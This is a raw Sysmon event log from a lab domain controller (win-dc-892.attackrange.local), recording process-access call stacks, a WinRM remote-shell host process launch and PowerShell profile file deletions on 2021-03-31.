.dll+51821 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.873{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.888{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6442-6064-7EBF-120000000000}0x12bf7e0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.873{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.873{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.873{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.764{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.764{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.764{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.732{266CAFBE-6442-6064-E302-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.701{266CAFBE-6442-6064-E402-00000000AD01}4600ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.685{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.670{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 